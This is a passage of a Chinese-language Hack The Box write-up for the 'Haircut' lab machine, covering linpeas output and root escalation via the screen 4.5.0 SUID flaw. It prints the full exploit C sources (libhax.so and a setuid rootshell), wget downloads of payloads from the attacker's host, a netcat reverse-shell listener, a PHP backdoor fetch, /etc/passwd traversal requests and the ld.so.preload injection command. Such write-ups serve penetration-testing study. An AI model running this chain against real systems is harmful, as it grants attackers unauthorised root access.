/var/lib/lxcfs/cgroup/memory/system.slice/keyboard-setup.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/kmod-static-nodes.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lightdm.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lvm2-monitor.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/mdadm.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/mysql.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/networking.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/nginx.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ondemand.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/open-iscsi.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/open-vm-tools.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/php7.0-fpm.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/polkitd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/rc-local.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/resolvconf.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/setvtrgb.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/snapd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ssh.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-journal-flush.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-modules-load.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-random-seed.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-remount-fs.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-sysctl.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-tmpfiles-setup-dev.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-tmpfiles-setup.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-udev-trigger.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-update-utmp.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-user-sessions.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/unattended-upgrades.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/var-lib-lxcfs.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/user.slice/cgroup.event_control
/var/lib/nginx/body
/var/lib/nginx/fastcgi
/var/lib/nginx/proxy
/var/lib/nginx/scgi
/var/lib/nginx/uwsgi
/var/lib/php/sessions
/var/log/nginx/access.log
/var/log/nginx/access.log.1
/var/log/nginx/access.log.2.gz
/var/log/nginx/access.log.3.gz
/var/log/nginx/error.log
#)You_can_write_even_more_files_inside_last_directory

/var/tmp

╔══════════╣ Interesting GROUP writable files (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files        

                            ╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════      
                            ╚═════════════════════════╝                                  
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path                                                                                        
/usr/local/bin/screen/tty.sh                                                             
/usr/local/bin/screen/doc/install.sh
/usr/local/bin/screen/autogen.sh
/usr/local/bin/screen/install.sh
/usr/local/bin/screen/comm.sh
/usr/local/bin/screen/osdef.sh
/usr/local/bin/screen/term.sh
/usr/bin/gettext.sh

╔══════════╣ Executable files potentially added by user (limit 70)
2017-05-19+09:59:26.2165576550 /var/www/html/uploads/bounce.jpg                          
2017-05-19+07:27:06.1815656090 /usr/bin/screen-4.5.0
2017-05-19+07:27:01.5535970860 /usr/local/bin/screen/screen
2017-05-19+07:26:42.5017490810 /usr/local/bin/screen/config.status
2017-05-19+07:21:00.3726339120 /usr/local/bin/screen/install
2017-01-17+20:29:21.8856649350 /usr/local/bin/screen/configure
2017-01-17+20:28:29.3614044810 /usr/local/bin/screen/autogen.sh
2017-01-17+20:27:18.9690554240 /usr/local/bin/screen/install.sh
2017-01-17+20:27:18.9690554240 /usr/local/bin/screen/etc/toolcheck
2017-01-17+20:27:18.9690554240 /usr/local/bin/screen/etc/newsyntax38
2017-01-17+20:27:18.9690554240 /usr/local/bin/screen/etc/newsyntax
2017-01-17+20:27:18.9690554240 /usr/local/bin/screen/etc/mkinstalldirs
2017-01-17+20:27:18.9650554050 /usr/local/bin/screen/etc/countmail
2017-01-17+20:27:18.9650554050 /usr/local/bin/screen/etc/ccdefs

╔══════════╣ Unexpected in root
/initrd.img                                                                              
/vmlinuz.old
/initrd.img.old
/vmlinuz

╔══════════╣ Modified interesting files in the last 5mins (limit 100)
/var/log/kern.log                                                                        
/var/log/syslog
/var/log/auth.log

logrotate 3.8.7

╔══════════╣ Files inside /var/www (limit 20)
total 12                                                                                 
drwxr-xr-x  3 root root 4096 May 16  2017 .
drwxr-xr-x 14 root root 4096 May 16  2017 ..
drwxr-xr-x  3 root root 4096 May 19  2017 html

╔══════════╣ Files inside others home (limit 20)
/home/maria/user.txt                                                                     
/home/maria/.tasks/task1
/home/maria/.xsession-errors
/home/maria/Desktop/user.txt
/home/maria/.bash_logout
/home/maria/.bashrc
/home/maria/.dmrc
/home/maria/.wget-hsts
/home/maria/.mysql_history
/home/maria/.bash_history
/home/maria/.profile
/home/maria/.ICEauthority
/home/maria/.Xauthority
/home/maria/.local/share/.converted-launchers
/home/maria/.local/share/unity-settings-daemon/input-sources-converted
/home/maria/.local/share/session_migration-ubuntu
/home/maria/.sudo_as_admin_successful
/var/www/html/hair.html
/var/www/html/carrie.jpg
/var/www/html/test.html

╔══════════╣ Searching installed mail applications
                                                                
╔══════════╣ Mails (limit 50)

╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root root 8990 Apr 26  2017 /lib/modules/4.4.0-77-generic/kernel/drivers/power/wm831x_backup.ko
-rw-r--r-- 1 root root 8710 Apr 26  2017 /lib/modules/4.4.0-77-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 8990 Apr 27  2017 /lib/modules/4.4.0-78-generic/kernel/drivers/power/wm831x_backup.ko
-rw-r--r-- 1 root root 8710 Apr 27  2017 /lib/modules/4.4.0-78-generic/kernel/drivers/net/team/team_mode_activebackup.ko
-rw-r--r-- 1 root root 20 Feb  9  2017 /etc/vmware-tools/tools.conf.old
-rw-r--r-- 1 root root 673 May 15  2017 /etc/xml/xml-core.xml.old
-rw-r--r-- 1 root root 610 May 15  2017 /etc/xml/catalog.old
-rw-r--r-- 1 root root 159 May 16  2017 /var/lib/sgml-base/supercatalog.old
-rwxr-sr-x 1 root utmp 434216 Feb  7  2016 /usr/bin/screen.old
-rw-r--r-- 1 root root 31600 Feb  9  2017 /usr/lib/open-vm-tools/plugins/vmsvc/libvmbackup.so                                                                                     
-rw-r--r-- 1 root root 11440 May 16  2017 /usr/share/info/dir.old
-rw-r--r-- 1 root root 7867 May  6  2015 /usr/share/doc/telnet/README.telnet.old.gz
-rw-r--r-- 1 root root 298768 Dec 29  2015 /usr/share/doc/manpages/Changes.old.gz
-rw-r--r-- 1 root root 665 Apr 16  2016 /usr/share/man/man8/vgcfgbackup.8.gz
-rwxr-xr-x 1 root root 226 Apr 14  2016 /usr/share/byobu/desktop/byobu.desktop.old
-rw-r--r-- 1 root root 0 Apr 27  2017 /usr/src/linux-headers-4.4.0-78-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 Apr 27  2017 /usr/src/linux-headers-4.4.0-78-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 190366 Apr 27  2017 /usr/src/linux-headers-4.4.0-78-generic/.config.old
-rw-r--r-- 1 root root 0 Apr 26  2017 /usr/src/linux-headers-4.4.0-77-generic/include/config/wm831x/backup.h
-rw-r--r-- 1 root root 0 Apr 26  2017 /usr/src/linux-headers-4.4.0-77-generic/include/config/net/team/mode/activebackup.h
-rw-r--r-- 1 root root 190366 Apr 26  2017 /usr/src/linux-headers-4.4.0-77-generic/.config.old

╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /var/lib/mlocate/mlocate.db: regular file, no read permission 
╔══════════╣ Web files?(output limit)
/var/www/:                                                                               
total 12K
drwxr-xr-x  3 root root 4.0K May 16  2017 .
drwxr-xr-x 14 root root 4.0K May 16  2017 ..
drwxr-xr-x  3 root root 4.0K May 19  2017 html

/var/www/html:
total 444K
drwxr-xr-x 3 root     root     4.0K May 19  2017 .
drwxr-xr-x 3 root     root     4.0K May 16  2017 ..

╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)                                                                         
-rw-r--r-- 1 root root 220 Sep  1  2015 /etc/skel/.bash_logout                           
-rw-r--r-- 1 root root 1391 May 16  2017 /etc/apparmor.d/cache/.features
-rw------- 1 root root 0 Feb 15  2017 /etc/.pwd.lock
-rw-r--r-- 1 maria maria 6774 Jan 17  2017 /usr/local/bin/screen/.iscreenrc
-rw-r--r-- 1 root root 0 Jan  3 09:17 /run/network/.ifstate.lock
-rw------- 1 maria maria 957 May 16  2017 /home/maria/.xsession-errors
-rw-r--r-- 1 maria maria 220 May 15  2017 /home/maria/.bash_logout
-rw-r--r-- 1 maria maria 25 May 16  2017 /home/maria/.dmrc
-rw-rw-r-- 1 maria maria 203 May 19  2017 /home/maria/.wget-hsts
-rw------- 1 maria maria 322 May 16  2017 /home/maria/.ICEauthority
-rw-rw-r-- 1 maria maria 0 May 16  2017 /home/maria/.local/share/.converted-launchers

╔══════════╣ Readable files inside /tmp, /var/tmp, /private/tmp, /private/var/at/tmp, /private/var/tmp, and backup folders (limit 70)                                             
-rwxr-xr-x 1 www-data www-data 847920 Dec 28 07:40 /tmp/linpeas.sh                       
-rw-r--r-- 1 root root 43 May 15  2017 /var/backups/dpkg.arch.3.gz
-rw-r--r-- 1 root root 43 May 15  2017 /var/backups/dpkg.arch.2.gz
-rw-r--r-- 1 root root 43 May 15  2017 /var/backups/dpkg.arch.1.gz
-rw-r--r-- 1 root root 11 May 15  2017 /var/backups/dpkg.arch.0
-rw-r--r-- 1 root root 43 May 15  2017 /var/backups/dpkg.arch.4.gz
-rw-r--r-- 1 root root 2250 May 17  2017 /var/backups/alternatives.tar.1.gz
-rw-r--r-- 1 root root 51200 May 26  2017 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 2622 May 16  2017 /var/backups/alternatives.tar.2.gz

╔══════════╣ Searching passwords in history files

╔══════════╣ Searching *password* or *credential* files in home (limit 70)
/bin/systemd-ask-password                                                                
/bin/systemd-tty-ask-password-agent
/etc/pam.d/common-password
/usr/lib/git-core/git-credential
/usr/lib/git-core/git-credential-cache
/usr/lib/git-core/git-credential-cache--daemon
/usr/lib/git-core/git-credential-store
  #)There are more creds/passwds files in the previous parent folder

/usr/lib/grub/i386-pc/password.mod
/usr/lib/grub/i386-pc/password_pbkdf2.mod
/usr/lib/mysql/plugin/validate_password.so
/usr/share/dns/root.key
/usr/share/doc/git/contrib/credential
/usr/share/doc/git/contrib/credential/gnome-keyring/git-credential-gnome-keyring.c
/usr/share/doc/git/contrib/credential/netrc/git-credential-netrc
/usr/share/doc/git/contrib/credential/osxkeychain/git-credential-osxkeychain.c
/usr/share/doc/git/contrib/credential/wincred/git-credential-wincred.c
/usr/share/locale-langpack/en_AU/LC_MESSAGES/ubuntuone-credentials.mo
/usr/share/locale-langpack/en_GB/LC_MESSAGES/ubuntuone-credentials.mo
/usr/share/man/man1/git-credential-cache--daemon.1.gz
/usr/share/man/man1/git-credential-cache.1.gz
/usr/share/man/man1/git-credential-store.1.gz
/usr/share/man/man1/git-credential.1.gz
  #)There are more creds/passwds files in the previous parent folder

/usr/share/man/man7/gitcredentials.7.gz
/usr/share/man/man8/systemd-ask-password-console.path.8.gz
/usr/share/man/man8/systemd-ask-password-console.service.8.gz
/usr/share/man/man8/systemd-ask-password-wall.path.8.gz
/usr/share/man/man8/systemd-ask-password-wall.service.8.gz
  #)There are more creds/passwds files in the previous parent folder

/usr/share/pam/common-password.md5sums
/var/cache/debconf/passwords.dat
/var/lib/pam/password

╔══════════╣ Checking for TTY (sudo/su) passwords in audit logs

╔══════════╣ Searching passwords inside logs (limit 70)
 base-passwd depends on libc6 (>= 2.8); however:                                         
 base-passwd depends on libdebconfclient0 (>= 0.145); however:
10.10.14.4 - - [03/Jan/2024:09:35:43 +0100] "GET /.%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd HTTP/1.1" 400 182 "-" "-"
10.10.14.4 - - [03/Jan/2024:09:37:39 +0100] "GET /cgi-bin/.%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd HTTP/1.1" 400 182 "-" "-"                                                          
Description: Set up users and passwords
Preparing to unpack .../base-passwd_3.5.39_amd64.deb ...
Preparing to unpack .../passwd_1%3a4.2-3.1ubuntu5_amd64.deb ...
Selecting previously unselected package base-passwd.
Selecting previously unselected package passwd.
Setting up base-passwd (3.5.39) ...
Setting up passwd (1:4.2-3.1ubuntu5) ...
Shadow passwords are now on.
Unpacking base-passwd (3.5.39) ...
Unpacking base-passwd (3.5.39) over (3.5.39) ...
Unpacking passwd (1:4.2-3.1ubuntu5) ...
dpkg: base-passwd: dependency problems, but configuring anyway as you requested:
                                ╔════════════════╗
════════════════════════════════╣ API Keys Regex ╠════════════════════════════════       
                                ╚════════════════╝                                       
Regexes to search for API keys aren't activated, use param '-r' 


www-data@haircut:/tmp$ 

16、按照正常来说，这里是 suid 提权的，但是我毕竟还是经验少，没有识别出来，这里参看演示报告

www-data@haircut:/tmp$ find / -perm -4000 -o -perm -2000 -type f 2>/dev/null
find / -perm -4000 -o -perm -2000 -type f 2>/dev/null
/bin/ntfs-3g
/bin/ping6
/bin/fusermount
/bin/su
/bin/mount
/bin/ping
/bin/umount
/sbin/unix_chkpwd
/sbin/pam_extrausers_chkpwd
/usr/bin/sudo
/usr/bin/mlocate
/usr/bin/pkexec
/usr/bin/chage
/usr/bin/screen.old
/usr/bin/newuidmap
/usr/bin/crontab
/usr/bin/bsd-write
/usr/bin/newgrp
/usr/bin/newgidmap
/usr/bin/expiry
/usr/bin/gpasswd
/usr/bin/ssh-agent
/usr/bin/at
/usr/bin/passwd
/usr/bin/screen-4.5.0
/usr/bin/chsh
/usr/bin/wall
/usr/bin/chfn
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/x86_64-linux-gnu/utempter/utempter
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
www-data@haircut:/tmp$

/usr/bin/screen-4.5.0

https://www.exploit-db.com/exploits/41154

17、下载目标利用工具，发现无法在靶机上面利用

www-data@haircut:/tmp$ wget http://10.10.14.4/poc.sh
wget http://10.10.14.4/poc.sh
--2024-01-03 15:40:57--  http://10.10.14.4/poc.sh
Connecting to 10.10.14.4:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1152 (1.1K) [text/x-sh]
Saving to: 'poc.sh'

poc.sh              100%[===================>]   1.12K  --.-KB/s    in 0s      

2024-01-03 15:40:57 (24.6 MB/s) - 'poc.sh' saved [1152/1152]

www-data@haircut:/tmp$ chmod +x poc.sh
chmod +x poc.sh
www-data@haircut:/tmp$ ./poc.sh
./poc.sh
~ gnu/screenroot ~
[+] First, we create our shell and library...
gcc: error trying to exec 'cc1': execvp: No such file or directory
gcc: error trying to exec 'cc1': execvp: No such file or directory
[+] Now we create our /etc/ld.so.preload file...
[+] Triggering...
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
ERROR: ld.so: object '/tmp/libhax.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
No Sockets found in /tmp/screens/S-www-data.

./poc.sh: line 42: /tmp/rootshell: No such file or directory
www-data@haircut:/tmp$ 

18、然后我使用在线的box系统，进行本地编译使用

┌─[us-vip-22]─[10.10.14.5]─[shiyan@htb-drvcllg9wi]─[~/Desktop]
└──╼ [★]$ cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
┌─[us-vip-22]─[10.10.14.5]─[shiyan@htb-drvcllg9wi]─[~/Desktop]
└──╼ [★]$ gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
/tmp/libhax.c: In function ‘dropshell’:
/tmp/libhax.c:7:5: warning: implicit declaration of function ‘chmod’ [-Wimplicit-function-declaration]
    7 |     chmod("/tmp/rootshell", 04755);
      |     ^~~~~
┌─[us-vip-22]─[10.10.14.5]─[shiyan@htb-drvcllg9wi]─[~/Desktop]
└──╼ [★]$ cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
┌─[us-vip-22]─[10.10.14.5]─[shiyan@htb-drvcllg9wi]─[~/Desktop]
└──╼ [★]$ gcc -o /tmp/rootshell /tmp/rootshell.c
/tmp/rootshell.c: In function ‘main’:
/tmp/rootshell.c:3:5: warning: implicit declaration of function ‘setuid’ [-Wimplicit-function-declaration]
    3 |     setuid(0);
      |     ^~~~~~
/tmp/rootshell.c:4:5: warning: implicit declaration of function ‘setgid’ [-Wimplicit-function-declaration]
    4 |     setgid(0);
      |     ^~~~~~
/tmp/rootshell.c:5:5: warning: implicit declaration of function ‘seteuid’ [-Wimplicit-function-declaration]
    5 |     seteuid(0);
      |     ^~~~~~~
/tmp/rootshell.c:6:5: warning: implicit declaration of function ‘setegid’ [-Wimplicit-function-declaration]
    6 |     setegid(0);
      |     ^~~~~~~
/tmp/rootshell.c:7:5: warning: implicit declaration of function ‘execvp’ [-Wimplicit-function-declaration]
    7 |     execvp("/bin/sh", NULL, NULL);
      |     ^~~~~~
/tmp/rootshell.c:7:5: warning: too many arguments to built-in function ‘execvp’ expecting 2 [-Wbuiltin-declaration-mismatch]
┌─[us-vip-22]─[10.10.14.5]─[shiyan@htb-drvcllg9wi]─[~/Desktop]
└──╼ [★]$ 

19、然后把编译好的exp上传到目标靶机上面进行利用

┌─[us-vip-22]─[10.10.14.5]─[shiyan@htb-drvcllg9wi]─[~/Desktop]
└──╼ [★]$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.24 - - [03/Jan/2024 15:25:26] "GET /qsd-php-backdoor.php HTTP/1.1" 200 -
10.10.10.24 - - [03/Jan/2024 15:33:27] "GET /libhax.so HTTP/1.1" 200 -
10.10.10.24 - - [03/Jan/2024 15:33:38] "GET /rootshell HTTP/1.1" 200 -

┌─[us-vip-22]─[10.10.14.5]─[shiyan@htb-drvcllg9wi]─[~/Desktop]
└──╼ [★]$ nc -lvnp 10086
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::10086
Ncat: Listening on 0.0.0.0:10086
Ncat: Connection from 10.10.10.24.
Ncat: Connection from 10.10.10.24:44504.
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
ERROR: ld.so: object '/tmp/libhax.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
ERROR: ld.so: object '/tmp/libhax.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
ERROR: ld.so: object '/tmp/libhax.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
ERROR: ld.so: object '/tmp/libhax.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
www-data@haircut:~/html/uploads$ 

www-data@haircut:~/html/uploads$ cd /tmp
cd /tmp
www-data@haircut:/tmp$ ls
ls
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
ERROR: ld.so: object '/tmp/libhax.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
f
screens
systemd-private-77aca4f3922e4287ab678477723dad65-systemd-timesyncd.service-8Sh9jd
vmware-root
www-data@haircut:/tmp$ 
www-data@haircut:/tmp$ wget 10.10.14.5/libhax.so
wget 10.10.14.5/libhax.so
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
ERROR: ld.so: object '/tmp/libhax.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
--2024-01-03 16:33:00--  http://10.10.14.5/libhax.so
Connecting to 10.10.14.5:80... connected.
HTTP request sent, awaiting response... 405 Method Not Allowed
2024-01-03 16:33:00 ERROR 405: Method Not Allowed.

www-data@haircut:/tmp$ wget 10.10.14.5:8000/libhax.so
wget 10.10.14.5:8000/libhax.so
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
ERROR: ld.so: object '/tmp/libhax.so' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
--2024-01-03 16:33:28--  http://10.10.14.5:8000/libhax.so
Connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19656 (19K) [application/octet-stream]
Saving to: 'libhax.so'

libhax.so           100%[===================>]  19.20K  --.-KB/s    in 0.01s   

2024-01-03 16:33:28 (1.54 MB/s) - 'libhax.so' saved [19656/19656]

www-data@haircut:/tmp$ wget 10.10.14.5:8000/rootshell
wget 10.10.14.5:8000/rootshell
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
--2024-01-03 16:33:38--  http://10.10.14.5:8000/rootshell
Connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 20288 (20K) [application/octet-stream]
Saving to: 'rootshell'

rootshell           100%[===================>]  19.81K  --.-KB/s    in 0.01s   

2024-01-03 16:33:38 (1.59 MB/s) - 'rootshell' saved [20288/20288]

www-data@haircut:/tmp$ ls
ls
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
f
libhax.so
rootshell
screens
systemd-private-77aca4f3922e4287ab678477723dad65-systemd-timesyncd.service-8Sh9jd
vmware-root
www-data@haircut:/tmp$ cd /etc
cd /etc
www-data@haircut:/etc$ umask 000
umask 000
www-data@haircut:/etc$ screen-4.5.0 -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"
<en-4.5.0 -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"              
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
www-data@haircut:/etc$ screen-4.5.0 -ls
screen-4.5.0 -ls
' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored.
[+] done!
No Sockets found in /tmp/screens/S-www-data.

20、成功上传后，开始漏洞利用，并获取到权限，以及flag信息

www-data@haircut:/etc$ /tmp/rootshell
/tmp/rootshell
# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
# cat /root/root.txt
cat /root/root.txt
46d1029a451cc74bbb249969b46f61fb
# 

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/21